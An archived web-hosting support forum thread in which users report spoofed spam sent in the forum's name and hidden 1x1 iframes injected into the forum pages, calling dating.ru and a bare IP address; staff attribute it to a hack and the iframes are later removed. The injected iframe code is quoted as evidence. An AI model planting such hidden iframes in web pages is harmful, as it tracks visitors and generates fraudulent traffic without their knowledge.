Help - Search - Members - Calendar
Full Version: spam from your site.
Hostony Board > General > Pre-Sales Questions
someone
Aug 8 2006, 05:26 PM
CODE
Return-path: <forum_hostony@master3.fastbighost.com>
Received: from [69.72.157.58] (port=40626 helo=master3.fastbighost.com)
    by mx11.mail.ru with esmtp
    id 1GAW62-0005Ze-00
    for ................; Tue, 08 Aug 2006 22:14:30 +0400
Received-SPF: none (mx11.mail.ru: 69.72.157.58 is neither permitted nor denied by domain of master3.fastbighost.com) client-ip=69.72.157.58; envelope-from=forum_hostony@master3.fastbighost.com; helo=master3.fastbighost.com;
Received: from master3.fastbighost.com (master3.fastbighost.com [127.0.0.1])
    by master3.fastbighost.com (8.12.11.20060308/8.12.11) with ESMTP id k78HDd0m018172
    for <................>; Tue, 8 Aug 2006 13:13:42 -0400
Received: (from forum_hostony@localhost)
    by master3.fastbighost.com (8.12.11.20060308/8.12.11/Submit) id k78HDcT4018171;
    Tue, 8 Aug 2006 13:13:38 -0400
Date: Tue, 8 Aug 2006 13:13:38 -0400
Message-Id: <200608081713.k78HDcT4018171@master3.fastbighost.com>
To: ................
Subject: dear friends ( Hostony Board )
MIME-Version: 1.0
Content-type: text/html; charset="iso-8859-1"
From: "Hostony Board" <forum@hostony.com>
X-Priority: 3
X-Mailer: IPB PHP Mailer
X-Spam: Not detected


someone is spamming using using names of your forum, giving link to some site,
CODE
http://keghifj.nasfield.info/?abcdlmfjxwrurykzvpeghi
their details 83.17.86.218 AS5617
TPNET - ane218.internetdsl.tpnet.pl - Unix: 20:01:58.276
Guest_Bandon_*
Aug 8 2006, 07:57 PM
I received this same email. It isn't from hostony, but they should want to look into it.
Lehrer
Aug 9 2006, 04:07 PM
Thanks for the notification, guys. The forum was recently hacked, and consequently we have upgraded it to the latest stable version.
Michael Aivaliotis
Sep 6 2006, 03:54 AM
.
bpgisme
Sep 6 2006, 04:21 AM
Hey! I noticed that "dating.ru" thing but I didn't know what it was. I visited this forum a day or so ago and it got stuck or something in my Firefox and what kept spinning was "dating.ru". blink.gif

-Bonnie
MartinB
Oct 26 2006, 08:36 PM
this iframe is still there.
MarkM
Nov 6 2006, 06:33 AM
Yes, the iFrame is still there. Please tell a HOSTONY programmer to remove it. We are worrying about our security on this forum now. dry.gif

This is what I see in the forum code:
CODE
<iframe src="http://dating.ru/?dating=13740" width=1 height=1></iframe>
Lehrer
Nov 6 2006, 01:00 PM
Hello Hostony forumers,

we had a look on the server and there is nothing connected with dating.ru in the main index file.

It is only listed in the forum database, which can't be of any menace.

Second,

QUOTE
CODE
Return-path: <forum_hostony@master3.fastbighost.com>
Received: from [69.72.157.58](port=40626 helo=master3.fastbighost.com)
by mx11.mail.ru with esmtp
id 1GAW62-0005Ze-00
for ................; Tue, 08 Aug 2006 22:14:30 +0400
Received-SPF: none (mx11.mail.ru: 69.72.157.58 is neither permitted nor denied by domain of master3.fastbighost.com) client-ip=69.72.157.58; envelope-from=forum_hostony@master3.fastbighost.com; helo=master3.fastbighost.com;
Received: from master3.fastbighost.com (master3.fastbighost.com [127.0.0.1])
by master3.fastbighost.com (8.12.11.20060308/8.12.11) with ESMTP id k78HDd0m018172
for <................>; Tue, 8 Aug 2006 13:13:42 -0400
Received: (from forum_hostony@localhost)
by master3.fastbighost.com (8.12.11.20060308/8.12.11/Submit) id k78HDcT4018171;
Tue, 8 Aug 2006 13:13:38 -0400
Date: Tue, 8 Aug 2006 13:13:38 -0400
Message-Id: <200608081713.k78HDcT4018171@master3.fastbighost.com>
To: ................
Subject: dear friends ( Hostony Board )
MIME-Version: 1.0
Content-type: text/html; charset="iso-8859-1"
From: "Hostony Board" <forum@hostony.com>
X-Priority: 3
X-Mailer: IPB PHP Mailer
X-Spam: Not detected


someone is spamming using using names of your forum, giving link to some site,
CODE
http://keghifj.nasfield.info/?abcdlmfjxwrurykzvpeghi
their details 83.17.86.218 AS5617
TPNET - ane218.internetdsl.tpnet.pl - Unix: 20:01:58.276


THis was only a try to send spam from us, however not successful as we have checked the server logs and found nothing suspicious there.
MarkM
Jan 26 2007, 02:33 AM
QUOTE(MarkMutti @ Nov 5 2006, 10:33 PM) *
Yes, the iFrame is still there. Please tell a HOSTONY programmer to remove it. We are worrying about our security on this forum now. dry.gif

This is what I see in the forum code:
CODE
<iframe src="http://dating.ru/?dating=13740" width=1 height=1></iframe>

The iframe is still there! I realize that the frame is some type of affiliate link.

Please, if a staff member has put it there on purpose, tell us - Otherwise I'm not sure if I can endorse this forum by posting if you guys are going to keep being sneaky like this.

Again, have someone remove the code PLEASE!
MaineCove
Feb 1 2007, 04:44 PM
I was just going to post on the same thing.

I noticed when I logged in at http://forum.hostony.com/ that it was waiting on dating.ru which made me curious because I certainly had no clue I was going to associated with any such website through my web hosting.

There is the code in the page:
<iframe src="http://dating.ru/?dating=13740" width=1 height=1></iframe>

Pretty sketchy and someone needs to remove it asap.

Also, what is this iframe for:
<iframe src="http://64.62.171.141:84/logo.gif" width=1 height=1></iframe>
MartinB
Feb 1 2007, 04:48 PM
is like this iframe was added to generate traffic for this website.
MaineCove
Feb 8 2007, 06:26 PM
I need a serious reply from someone in authority at hostony in regards to this matter.

Just by logging on to the support forum I am having cookies set on my PC by the domains dating.bride.ru, dating.ru and yadro.ru.

This is unacceptable. I have recommended hostony to four businesses now and was in the process of talking to a fifth. If this is company approved behavior, to generate affiliate fraud by generating false traffic and/or attach people by cookies to sketchy sites that they never visited, I need to know.

I am sure others would be interested in the answer as well.
MartinB
Feb 8 2007, 06:34 PM
you are not exaggerating a little the issue ? smile.gif

Btw, I'm curious about the hostony's answer about this wink.gif
MaineCove
Feb 8 2007, 07:16 PM
QUOTE(MartinB @ Feb 8 2007, 06:34 PM) *
you are not exaggerating a little the issue ? smile.gif

Btw, I'm curious about the hostony's answer about this wink.gif


I am not exaggerating. When the logs on my work computer, or my clients' work computers, appear as though we are visiting russian bride and dating websites on breaks, does someone at hostony want to have that conversation with my manager to explain why?

On top of that click/traffic fraud is fraud. If a company is willing to partake in this form of fraud why should I be confident that they will be on the up and up when it comes to my data, my personal information, my credit card numbers?

I hope that it is just an honest mistake on their part, but this has lingered out there for six months without resolution. Removing the offending piece of code is not difficult. Why has it not been done?
MartinB
Feb 8 2007, 07:28 PM
QUOTE(MaineCove @ Feb 8 2007, 04:16 PM) *
I am not exaggerating. When the logs on my work computer, or my clients' work computers, appear as though we are visiting russian bride and dating websites on breaks, does someone at hostony want to have that conversation with my manager to explain why?


good point
(currently I'm deleting the cookies here, LOL)
MaineCove
Feb 12 2007, 08:12 AM
Surprised the tech staff didn't post here, but I will on their behalf...

The problem has been resolved. The forum software has been updated and the iframes have been removed.

It would appear hostony was just the victim of a malicious hack which they have now resolved.

Thank you for reaffirming my decision to both host with you and recommend you to others.


This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2024 Invision Power Services, Inc.
IPS Driver Error

IPS Driver Error

There appears to be an error with the database.
You can try to refresh the page by clicking here